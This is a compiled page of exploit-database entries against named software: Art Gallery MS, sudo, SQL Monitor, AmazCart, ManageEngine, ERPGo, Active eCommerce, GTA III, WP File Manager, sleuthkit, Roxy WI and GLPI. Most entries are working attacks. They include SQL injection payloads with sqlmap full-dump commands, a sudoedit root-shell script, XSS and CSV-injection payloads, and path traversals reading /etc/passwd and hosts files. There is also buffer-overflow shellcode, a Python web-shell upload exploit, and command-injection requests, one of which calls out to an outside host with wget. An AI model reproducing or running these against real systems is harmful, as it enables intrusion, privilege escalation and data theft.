ISHACK AI BOT

# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated # Date: 20/01/2023 # Exploit Author: Rahul Patwari # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip # Version: 1.0 # Tested on: XAMPP / Windows 10 # CVE : CVE-2023-23162 # Proof of Concept: # 1- Install The application Art Gallery Management System Project v1.0 # 2- Navigate to the product page by clicking on the "ART TYPE" by selecting any of the categories on the menu. # 3- Now insert a single quote ( ' ) on "cid" parameter to break the database query, you will see the output is not shown. # 4- Now inject the payload double single quote ('') in the "cid" parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output. # 5- Now find how many columns are returned by the SQL query. this query will return 6 columns. Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures # 6- for manually getting data from the database insert the below payload to see the user of the database. payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs # 7- for automation using "SQLMAP" intercept the request and copy this request to a file called "request.txt". # 8- now to get all database data use the below "sqlmap" command to fetch all the data. Command: sqlmap -r request.txt -p cid --dump-all --batch # Go to this url " https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs "

# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated # Date: 20/01/2023 # Exploit Author: Rahul Patwari # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip # Version: 1.0 # Tested on: XAMPP / Windows 10 # CVE : CVE-2023-23163 # Proof of Concept: # 1- Install The application Art Gallery Management System Project v1.0 # 2- Navigate to admin login page and login with the valid username and password<admin:Test@123>. URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php # 3- Now navigate "Manage ART TYPE" by clicking on "ART TYPE" option on left side bar. # 4- Now click on any of the Art Type "Edit" button and you will redirect to the edit page of art type. # 5- Now insert a single quote ( ' ) on "editid" parameter to break the database query, you will see the output is not shows. # 6- Now inject the payload double single quote ('') in the "editid" parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output. # 7- Now find how many column are returns by the SQL query. this query will return 6 column. Payload:editid=6%27order%20by%203%20--%20- # 8- For manually get data of database insert the below payload to see the user of the database. payload: editid=-6%27union%20all%20select%201,user(),3--%20- # 9- Now to get all database data use below "sqlmap" command to fetch all the data. Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch

#!/usr/bin/env bash # Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation # Exploit Author: n3m1.sys # CVE: CVE-2023-22809 # Date: 2023/01/21 # Vendor Homepage: https://www.sudo.ws/ # Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz # Version: 1.8.0 to 1.9.12p1 # Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9 # # Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc # # Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine. # # The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the # attacker to add a line to gain privileges on all the files and get a root # shell. if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' then echo "> Currently installed sudo version is not vulnerable" exit 1 fi EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-) if [ -z "$EXPLOITABLE" ]; then echo "> It doesn't seem that this user can run sudoedit as root" read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 else echo "> BINGO! User exploitable" echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" echo "$( whoami ) ALL=(ALL:ALL) ALL" read -n 1 -s -r -p "Press any key to continue..." EDITOR="vim -- /etc/sudoers" $EXPLOITABLE sudo su root exit 0 fi

# Exploit Title: SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS) # Date: [12/21/2022 02:07:23 AM UTC] # Exploit Author: [[email protected]] # Vendor Homepage: [https://www.red-gate.com/] # Software Link: [https://www.red-gate.com/products/dba/sql-monitor/] # Version: [SQL Monitor 12.1.31.893] # Tested on: [Windows OS] # CVE : [CVE-2022-47870] [Description] Cross Site Scripting (XSS) in the web SQL monitor login page in Redgate SQL Monitor 12.1.31.893 allows remote attackers to inject arbitrary web Script or HTML via the returnUrl parameter. [Affected Component] affected returnUrl in https://sqlmonitor.*.com/Account/Login?returnUrl=&hasAttemptedCookie=True affected A tag under span with "redirect-timeout" id value [CVE Impact] disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account. [Attack Vectors] to exploit the vulnerability, someone must click on the malicious A HTML tag under span with "redirect-timeout" id value [Vendor] http://redgate.com http://sqlmonitor.com https://sqlmonitor.

# Exploit Title: AmazCart CMS 3.4 - Cross-Site-Scripting (XSS) # Date: 17/01/2023 # Exploit Author: Sajibe Kanti # Vendor Name: CodeThemes # Vendor Homepage: https://spondonit.com/ # Software Link: https://codecanyon.net/item/amazcart-laravel-ecommerce-system-cms/34962179 # Version: 3.4 # Tested on: Live Demo # Demo Link : https://amazy.rishfa.com/ # Description # AmazCart - Laravel Ecommerce System CMS 3.4 is vulnerable to Reflected cross-site scripting because of insufficient user-supplied data sanitization. Anyone can submit a Reflected XSS payload without login in when searching for a new product on the search bar. This makes the application reflect our payload in the frontend search ber, and it is fired everything the search history is viewed. # Proof of Concept (PoC) : Exploit # 1) Goto: https://amazy.rishfa.com/ 2) Enter the following payload in 'Search Iteam box' : "><script>alert(1)</script> 3) Now You Get a Popout as Alert 1 4) Reflected XSS payload is fired # Image PoC : Reference Image # 1) Payload Fired: https://prnt.sc/QQaiZB3tFMVB

## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal ## Author: nu11secur1ty ## Date: 11.22.2023 ## Vendor: https://www.manageengine.com/ ## Software: https://www.manageengine.com/privileged-session-management/download.html ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309) ## Description: The `pmpcc` cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. The testing payload ..././..././..././..././..././..././..././..././..././..././etc/passwd was submitted in the pmpcc cookie. The requested file was returned in the application's response. The attacker easy can see all the JS structures of the server and can perform very dangerous actions. ## STATUS: HIGH Vulnerability [+] Exploits: ```GET GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1 Host: localhost:9292 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd; _zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a; JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E; JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Mobile: ?0 X-Requested-With: XMLHttpRequest Sec-CH-UA-Platform: Windows Referer: https://localhost:9292/AMPHome.html ``` [+] Response: ``` ,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is e-mailed to the user who raises the request, the user who closes the request and also to those e-mail ids specified at the time of closing the request.' ,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username' ,'js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Next synchronization is scheduled to run on' ,'js.agent.csharp_Windows_Agent':'C# Windows Agent' ,'js.PassTrixMainTab.in_sec':'Seconds' ,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or paste the CSR content.' ,'js.connection.colors':'Colors' ,'js.general.ShareToGroups':'Share resource to user groups' ,'js.connection.mapdisk':'Drives' ,'jsp.admin.Support.User_Forums':'User Forums' ,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)' ,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly integrate and perfectly fit into the pre-designed and automated integrations of the below listed RPA-powered platforms, to simulate the routine manual password retrieval from the PAM360 vault.' ,'js.discovery.loadhostnamefromfile':'From file' ,'js.AddListenerDetails.Please_enter_valid_implementation_class':'Please enter a valid Implementation Class' ,'js.general.GroupedResources':'Grouped Resources' ,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.' ,'PROCESSID':'Process Id' ,'js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Services fetched successfully' ,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled' ,'js.commonstr.search':'Search' ,'js.discovery.usercredential_type':'Credential Type' ,'jsp.admin.GeneralSetting.Check_high_availability_status_for':'Check high availability status every <input type=\"text\" class=\"txtbox\" name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\" style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\" > minutes.' ,'pki.js.help.entervalidnumber':'Please enter a valid number for Numeric Field Default Value.' ,'js.remoteapp.fetch':'Fetch' ,'js.admin.HighAvailability.configured_successfully':'Configured Successfully' ,'js.generalSettings_searchTerm_Password_reset':'Password Reset, Reason for password reset, disable ticket id, waiting time, wait time for service account password reset, linux unix password reset' ,'letsencrypt.enter.domainnames':'Enter domain names' ,'js.discovery.resourcetype':'Resource Type' ,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\'' ,'js.report.timeline.todate':'Valid To' ,'js.general_Language_Changed_Successfully':'Language Changed Successfully' ,'js.aws.credentials.label':'AWS Credential' ,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable purging of audit trails.' ,'js.general.user.orgn_bulkManage':'Manage Organization' ,'js.rolename.SSH_KEY':'Create\/Add key' ,'js.admin.admin.singledbmultiserver.name':'Application Scaling' ,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report' ,'js.settings.breach_settings.disable_api':'Disable API Access' ,'js.cmd.delete.not_possible':'Command cannot be deleted as it is already added to the following command set(s).' ,'js.settings.notification.domaincontent':'Notify if domains are expiring within' ,'js.aws.searchuser':'--Search UserName--' ,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing system settings in Admin >> General >> Ticketing System Integration.' ,'js.discovery.port':'Gateway Port' ,'usermanagement.showCertificates':'Show Certificates' ,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory cannot be empty' ,'js.sshreport.title':'SSH Resource Report' ,'js.encryptionkey.update':'Update' ,'js.aws.regions':'Region' ,'js.settingsTitle1.UserManagement':'User Management' ,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length' ,'js.commonstr.selectResources':'Select Resources' ,'RULENAME':'Rule Name' ,'jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'User Group added successfully' ,'js.reports.SSHReports.title':'SSH Reports' ,'js.CommonStr.ValueIsLess':'value is less than 2' ,'js.discovery.discoverystatus':'Discovery Status' ,'js.settings.security_settings.Web_Access':'Web Access' ,'js.general.node_name_cannot_be_empty':'Node name cannot be empty' ,'js.deploy.audit':'Deploy Audit' ,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority' ,'jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominate user group(s) to exempt from access control.' ,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)' ,'js.admin.HighAvailability.High_Availability_status':'Status' ,'settings.metracker.note0':'Disable ME Tracker if you do not wish to allow ManageEngine to collect product usage details.' ,'SERVICENAME':'Service Name' ,'settings.metracker.note1':'Access Manager Plus server has to be restarted for the changes to take effect.' ,'js.general.NewPinMismatch':'New PIN Mismatch' ,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\'' ,'java.ScheduleUtil.minutes':'minutes' ,'js.admin.sdpop_change.tooltip':'Enabling this option will require your users to provide valid Change IDs for the validation of password access requests and other similar operations. Leaving this option unchecked requires the users to submit valid Request IDs for validation.' ,'js.privacy_settings.title.redact':'Redact' ,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25 resources can be selected' ,'js.aboutpage.websitetitle':'Website' ,'js.customize.NumericField':'Numeric Field' ,'js.please.select.file':'Please select a file to upload.' ,'js.AutoLogon.Remote_connections':'Remote Connections' ,'pki.snmp.port':'Port' ,'java.dashboardutils.TODAY':'TODAY' ,'js.schedule.starttime':'Start Time' ,'js.ssh.keypassphrase':'Passphrase' ,'js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus' ,'js.analytics.tab.ueba.msg4':'guide' ,'js.analytics.tab.ueba.msg5':'to complete the integration. For any further questions, please write to us at [email protected].' ,'js.reportType.Option7.UserAuditReport':'Audit Report' ,'js.common.csr':'CSR' ,'js.globalsign.reissue.order':'Reissue Order' ,'js.analytics.tab.ueba.msg6':'Build a platform of expected behavior for individual users and entities by mapping different user accounts' ,'js.analytics.tab.ueba.msg7':'Verify actionable reports that symbolize compromise with details about actual behavior and expected behavior.' ,'js.resources.importcredential':'Import Credentials' ,'js.analytics.tab.ueba.msg1':'The Advanced Analytics module for PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from different sources, including firewalls, routers, workstations, databases, file servers and cloud services. Any deviation from normal behavior is classified as a time, count, or pattern anomaly. It then gives actionable insight to the IT Administrator with the use of risk scores, anomaly trends, and intuitive reports.' ,'js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:' ,'js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360 instance, download Log360 UEBA from the below link and follow the instructions in this' ,'js.settingsTitle2.MailServer':'Mail Server' ,'jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'Managing AMP Encryption Key' ,'settings.unmappedmails.email':'E-mail Address' ,'amp.connection.connection_type':'Connection Type' ,'js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior based on activity time, count, and pattern.' ,'godaddy.contactphone':'Contact Phone' ,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already implemented. Implement with some other class.' ,'js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors in Windows devices, SQL servers, FTP servers, and network devices such as routers, firewalls, and switches.' ,'js.rolename.freeCA.acme':'ACME' ,'digicert.label.dcv.cname':'CNAME Token' ,'js.helpcontent.createuser':'User Creation ' ,'pgpkeys.key.details':'Key Information' ,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status' ,'js.HomeTab.TaskAuditView':'Task Audit' ,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups Shared With User Group(s)' ,'js.common.importcsr.format':'(File format should be .csr)' ,'js.notificationpolicy.Submit':'Save' ,'pmp.vct.User_Audit_Configuration':'User Audit Configuration' ... ... ... ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)) ## Reference: [href](https://portswigger.net/kb/issues/00100300_file-path-traversal) ## Proof and Exploit: [href](https://streamable.com/scdzsb) ## Time spent `03:00:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit Data Base https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: ERPGo SaaS 3.9 - CSV Injection # Date: 18/01/2023 # Exploit Author: Sajibe Kanti # Vendor Name: RajodiyaInfotech # Vendor Homepage: https://rajodiya.com/ # Software Link: https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426 # Version: 3.9 # Tested on: Windows & Live Litespeed Web Server # Demo Link : https://demo.rajodiya.com/erpgo-saas/login # Description # ERPGo is a software as a service (SaaS) platform that is vulnerable to CSV injection attacks. This type of attack occurs when an attacker is able to manipulate the data that is imported or exported in a CSV file, in order to execute malicious code or gain unauthorized access to sensitive information. This vulnerability can be exploited by an attacker by injecting specially crafted data into a CSV file, which is then imported into the ERPGo system. This can potentially allow the attacker to gain access to sensitive information, such as login credentials or financial data, or to execute malicious code on the system. # Proof of Concept (PoC) : Exploit # 1) Go To : https://erpgo.127.0.0.1/ERPGo/register <====| Register New account 2) Complete the Registration 3) Now Click Accounting System Then Customer 4) Now Add a New Vendors / Click Create 5) Now Add this Payload in Name : =10+20+cmd|' /C calc'!A0 6) Now Submit This Form 7) Now Download Vendors List as csv 8) Open This CSV File in excel 9) Now a Calculator will open # Image PoC : Reference Image # 1) Payload Fired: https://prnt.sc/EkKPZiMa6yz8

# Exploit Title: Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS) # Date: 19/01/2023 # Exploit Author: Sajibe Kanti # Vendor Name: ActiveITzone # Vendor Homepage: https://activeitzone.com/ # Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405 # Version: 6.5.0 # Tested on: Live ( Centos & Litespeed Web Server) # Demo Link : https://demo.activeitzone.com/ecommerce/ # Description # The Active eCommerce CMS 6.5.0 application has a vulnerability in the profile picture upload feature that allows for stored cross-site scripting (XSS) attacks. Specifically, the vulnerability lies in the handling of "svg" image files, which can contain malicious code. An attacker can exploit this vulnerability by uploading a specially crafted "svg" image file as a profile picture, which will then be executed by the application when the user views the profile. This can allow the attacker to steal sensitive information, such as login credentials, or to perform other malicious actions on the user's behalf. This vulnerability highlights the importance of proper input validation and image file handling in web application development. # Exploit Details # # Vulnerable Path : /aiz-uploader/upload # Parameter: files (POST) # Vector: <svg version="1.1" baseProfile="full" xmlns=" http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("haha XSS"); </script> </svg> # Proof of Concept (PoC) : Exploit # 1) Goto: https://localhost 2) Click Registration 3) Login Your Account 4) Go Manage Profile 5) Now Upload Given Vector as anyname.svg (you must put vector code in anyname.svg file) 6) After Upload Clic to view Your profile picture 7) XSS Popup Will Fired # Image PoC : Reference Image # 1) Payload Fired: https://prnt.sc/cW0F_BtpyMcv

# Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow # Exploit Date: 22.01.2023 # Discovered and Written by: Knursoft # Vendor Homepage: https://www.rockstargames.com/ # Version: v1.1 # Tested on: Windows XP SP2/SP3, 7, 10 21H2 # CVE : N/A #1 - Run this python script to generate "evil.bmp" file. #2 - Copy it to [Your Game Path]\skins. #3 - Launch the game and navigate to Options > Player Setup and choose skin "evil". #4 - Buffer Overflow occurs and calc.exe pops up! #msfvenom -p windows/exec CMD="calc.exe" buf = b"" buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64" buf += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" buf += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c" buf += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52" buf += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49" buf += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" buf += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75" buf += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b" buf += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a" buf += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00" buf += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5" buf += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" buf += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" buf += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65" buf += b"\x00" #any shellcode should work, as it seems there is no badchars ver = 0 #set to 1 if you want it to work on GTA III steam version esp = b"\xb9\xc5\x14\x21" #mss32.dll jmp esp bmphdr = b"\x42\x4D\x36\x00\x03\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00" #generic bmp header payload = bmphdr payload += b"\x90" * 1026 if ver == 1: payload += b"\x90" * 112 payload += esp payload += b"\x90" * 20 #padding payload += buf with open("evil.bmp", "wb") as poc: poc.write(payload)

#!/usr/bin/env # Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE # Date: [ 22-01-2023 ] # Exploit Author: [BLY] # Vendor Homepage: [https://wpscan.com/vulnerability/10389] # Version: [ File Manager plugin 6.0-6.9] # Tested on: [ Debian ] # CVE : [ CVE-2020-25213 ] import sys,signal,time,requests from bs4 import BeautifulSoup #from pprint import pprint def handler(sig,frame): print ("[!]Saliendo") sys.exit(1) signal.signal(signal.SIGINT,handler) def commandexec(command): exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php" params = { "cmd":command } r=requests.get(exec_url,params=params) soup = BeautifulSoup(r.text, 'html.parser') text = soup.get_text() print (text) def exploit(): global url url = sys.argv[1] command = sys.argv[2] upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" headers = { 'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww", 'Connection': "close" } payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--" try: r=requests.post(upload_url,data=payload,headers=headers) #pprint(r.json()) commandexec(command) except: print("[!] Algo ha salido mal...") def help(): print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"") print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id") if __name__ == '__main__': if len(sys.argv) != 3: help() else: exploit()

# Exploit Title: sleuthkit 4.11.1 - Command Injection # Date: 2023-01-20 # CVE-2022-45639 # Vendor Homepage: https://github.com/sleuthkit # Vulnerability Type: Command injection # Attack Type: Local # Version: 4.11.1 # Exploit Author: Dino Barlattani, Giuseppe Granato # Link poc: https://www.binaryworld.it/guidepoc.asp#CVE-2022-45639 # POC: fls tool is affected by command injection in parameter "-m" when run on linux system. OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands via a crafted value to the m parameter when it run on linux, a user can insert in the -m parameter a buffer with backtick with a shell command. If it run with a web application as front end it can execute commands on the remote server. The function affected by the vulnerability is "tsk_fs_fls()" from the "fls_lib.c" file #ifdef TSK_WIN32 { .... } #else data.macpre = tpre; <--------------- return tsk_fs_dir_walk(fs, inode, flags, print_dent_act, &data); #endif Run command: $ fls -m `id` [Options] -- *Dino Barlattani* www.linkedin.com/in/dino-barlattani-10bba11a9/ www.binaryworld.it <http://Binaryworld.it> www.youtube.com/user/dinbar78

# Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control # Date of found: 21 July 2022 # Application: Roxy WI <= v6.1.0.0 # Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org # Software Link: https://github.com/hap-wi/roxy-wi.git # Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137 # Tested on: Ubuntu 22.04 # CVE : CVE-2022-31125 # PoC POST /app/options.py HTTP/1.1 Host: 192.168.56.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 105 Origin: https://192.168.56.114 Dnt: 1 Referer: https://192.168.56.114/app/login.py Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close alert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45

# ADVISORY INFORMATION # Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) # Date of found: 21 July 2022 # Application: Roxy WI <= v6.1.0.0 # Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org # Software Link: https://github.com/hap-wi/roxy-wi.git # Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137 # Tested on: Ubuntu 22.04 # CVE : CVE-2022-31126 # PoC POST /app/options.py HTTP/1.1 Host: 192.168.56.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 73 Origin: https://192.168.56.116 Referer: https://192.168.56.116/app/login.py Connection: close show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;

# ADVISORY INFORMATION # Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload # Date of found: 21 July 2022 # Application: Roxy WI <= v6.1.1.0 # Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org # Software Link: https://github.com/hap-wi/roxy-wi.git # Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137 # Tested on: Ubuntu 22.04 # CVE : CVE-2022-31161 # PoC POST /app/options.py HTTP/1.1 Host: 192.168.56.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 123 Origin: https://192.168.56.116 Referer: https://192.168.56.116/app/login.py Connection: close show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;

# ADVISORY INFORMATION # Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin # Date of found: 11 Jun 2022 # Application: GLPI Manageentities < 4.0.2 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/InfotelGLPI/manageentities # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE : CVE-2022-34127 # PoC GET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

# ADVISORY INFORMATION # Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion # Date of found: 11 Jun 2022 # Application: GLPI Glpiinventory <= 1.0.1 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/glpi-project/glpi-inventory-plugin # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE: CVE-2022-31062 # PoC POST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

